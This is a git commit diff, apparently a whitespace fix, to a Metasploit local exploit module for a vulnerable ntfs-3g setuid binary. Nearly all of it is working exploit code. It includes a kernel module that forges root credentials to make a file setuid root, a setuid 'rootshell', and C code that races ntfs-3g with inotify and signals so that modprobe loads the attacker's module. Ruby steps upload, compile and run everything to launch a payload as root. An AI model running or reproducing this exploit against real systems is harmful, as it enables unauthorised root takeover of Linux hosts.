forgot add fixes for travis

bug/bundler_fix
h00die 2017-02-25 23:25:36 -05:00
parent a8609f5c66
commit 0c353841ab
1 changed files with 25 additions and 25 deletions

View File

@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work. # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
def headers_installed?() def headers_installed?()
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}') output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
if output if output
if output.include?('linux-headers') if output.include?('linux-headers')
return true return true
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
CheckCode::Appears CheckCode::Appears
else else
print_error("Version installed not vulnerable: #{output}") print_error("Version installed not vulnerable: #{output}")
CheckCode::Safe CheckCode::Safe
end end
else else
print_error('ntfs-3g not installed') print_error('ntfs-3g not installed')
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
#include <linux/cred.h> #include <linux/cred.h>
#include <linux/syscalls.h> #include <linux/syscalls.h>
#include <linux/kallsyms.h> #include <linux/kallsyms.h>
static int suidfile_fd = -1; static int suidfile_fd = -1;
module_param(suidfile_fd, int, 0); module_param(suidfile_fd, int, 0);
static int __init init_rootmod(void) { static int __init init_rootmod(void) {
int (*sys_fchown_)(int fd, int uid, int gid); int (*sys_fchown_)(int fd, int uid, int gid);
int (*sys_fchmod_)(int fd, int mode); int (*sys_fchmod_)(int fd, int mode);
const struct cred *kcred, *oldcred; const struct cred *kcred, *oldcred;
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown"); sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod"); sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
printk(KERN_INFO "rootmod loading\n"); printk(KERN_INFO "rootmod loading\n");
kcred = prepare_kernel_cred(NULL); kcred = prepare_kernel_cred(NULL);
oldcred = override_creds(kcred); oldcred = override_creds(kcred);
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
revert_creds(oldcred); revert_creds(oldcred);
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */ return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
} }
static void __exit cleanup_rootmod(void) {} static void __exit cleanup_rootmod(void) {}
module_init(init_rootmod); module_init(init_rootmod);
module_exit(cleanup_rootmod); module_exit(cleanup_rootmod);
MODULE_LICENSE("GPL v2"); MODULE_LICENSE("GPL v2");
} }
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
#include <err.h> #include <err.h>
#include <stdio.h> #include <stdio.h>
#include <sys/types.h> #include <sys/types.h>
int main(void) { int main(void) {
if (setuid(0) || setgid(0)) if (setuid(0) || setgid(0))
err(1, "setuid/setgid"); err(1, "setuid/setgid");
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
#include <sys/wait.h> #include <sys/wait.h>
#include <time.h> #include <time.h>
#include <sys/utsname.h> #include <sys/utsname.h>
int main(void) { int main(void) {
/* prevent shell from backgrounding ntfs-3g when stopped */ /* prevent shell from backgrounding ntfs-3g when stopped */
pid_t initial_fork_child = fork(); pid_t initial_fork_child = fork();
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
execl("rootshell", "rootshell", NULL); execl("rootshell", "rootshell", NULL);
exit(0); exit(0);
} }
char buf[1000] = {0}; char buf[1000] = {0};
// Set up workspace with volume, mountpoint, modprobe config and module directory. // Set up workspace with volume, mountpoint, modprobe config and module directory.
char template[] = "/tmp/ntfs_sploit.XXXXXX"; char template[] = "/tmp/ntfs_sploit.XXXXXX";
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
template, template); template, template);
if (system(system_cmd)) if (system(system_cmd))
errx(1, "shell command failed"); errx(1, "shell command failed");
// Set up inotify watch for /proc/mounts. // Set up inotify watch for /proc/mounts.
// Note: /proc/mounts is a symlink to /proc/self/mounts, so // Note: /proc/mounts is a symlink to /proc/self/mounts, so
// the watch will only see accesses by this process. // the watch will only see accesses by this process.
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1) if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
err(1, "unable to watch /proc/mounts"); err(1, "unable to watch /proc/mounts");
// Set up inotify watch for /proc/filesystems. // Set up inotify watch for /proc/filesystems.
// This can be used to detect whether we lost the race. // This can be used to detect whether we lost the race.
int fs_inotify_fd = inotify_init1(IN_CLOEXEC); int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1) if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
err(1, "unable to watch /proc/filesystems"); err(1, "unable to watch /proc/filesystems");
// Set up inotify watch for /sbin/modprobe. // Set up inotify watch for /sbin/modprobe.
// This can be used to detect when we can release all our open files. // This can be used to detect when we can release all our open files.
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC); int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1) if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
err(1, "unable to watch /sbin/modprobe"); err(1, "unable to watch /sbin/modprobe");
int do_exec_pipe[2]; int do_exec_pipe[2];
if (pipe2(do_exec_pipe, O_CLOEXEC)) if (pipe2(do_exec_pipe, O_CLOEXEC))
err(1, "pipe"); err(1, "pipe");
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL); execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
} }
child = getpid(); child = getpid();
// Now launch ntfs-3g and wait until it opens /proc/mounts // Now launch ntfs-3g and wait until it opens /proc/mounts
if (write(do_exec_pipe[1], buf, 1) != 1) if (write(do_exec_pipe[1], buf, 1) != 1)
errx(1, "pipe write failed"); errx(1, "pipe write failed");
if (read(inotify_fd, buf, sizeof(buf)) <= 0) if (read(inotify_fd, buf, sizeof(buf)) <= 0)
errx(1, "inotify read failed"); errx(1, "inotify read failed");
if (kill(getppid(), SIGSTOP)) if (kill(getppid(), SIGSTOP))
err(1, "can't stop setuid parent"); err(1, "can't stop setuid parent");
// Check whether we won the main race. // Check whether we won the main race.
struct pollfd poll_fds[1] = {{ struct pollfd poll_fds[1] = {{
.fd = fs_inotify_fd, .fd = fs_inotify_fd,
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
exit(1); exit(1);
} }
puts("looks like we won the race"); puts("looks like we won the race");
// Open as many files as possible. Whenever we have // Open as many files as possible. Whenever we have
// a bunch of open files, move them into a new process. // a bunch of open files, move them into a new process.
int total_open_files = 0; int total_open_files = 0;
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
if (reached_limit) if (reached_limit)
break; break;
} }
// Wake up ntfs-3g and keep allocating files, then free up // Wake up ntfs-3g and keep allocating files, then free up
// the files as soon as we're reasonably certain that either // the files as soon as we're reasonably certain that either
// modprobe was spawned or the attack failed. // modprobe was spawned or the attack failed.
if (kill(getppid(), SIGCONT)) if (kill(getppid(), SIGCONT))
err(1, "SIGCONT"); err(1, "SIGCONT");
time_t start_time = time(NULL); time_t start_time = time(NULL);
while (1) { while (1) {
for (int i=0; i<1000; i++) { for (int i=0; i<1000; i++) {
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
print_status('Writing files to target') print_status('Writing files to target')
cmd_exec("cd #{datastore['WritableDir']}") cmd_exec("cd #{datastore['WritableDir']}")
#write all the files and compile. This is equivalent to the original compile.sh #write all the files and compile. This is equivalent to the original compile.sh
#gcc -o rootshell rootshell.c -Wall #gcc -o rootshell rootshell.c -Wall
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall") upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec('/sbin/depmod -b depmod_tmp/') cmd_exec('/sbin/depmod -b depmod_tmp/')
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .') cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
cmd_exec('rm -rf depmod_tmp') cmd_exec('rm -rf depmod_tmp')
register_file_for_cleanup("#{rootmod_path}.ko") register_file_for_cleanup("#{rootmod_path}.ko")
register_file_for_cleanup("#{rootmod_path}.mod.c") register_file_for_cleanup("#{rootmod_path}.mod.c")
register_file_for_cleanup("#{rootmod_path}.mod.o") register_file_for_cleanup("#{rootmod_path}.mod.o")
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
output = cmd_exec(sploit_path) output = cmd_exec(sploit_path)
unless session_created? unless session_created?
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened, # this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
# but binary payload was caught, or NIPS shut down the callback etc. # but binary payload was caught, or NIPS shut down the callback etc.
vprint_error(output) vprint_error(output)
end end
end end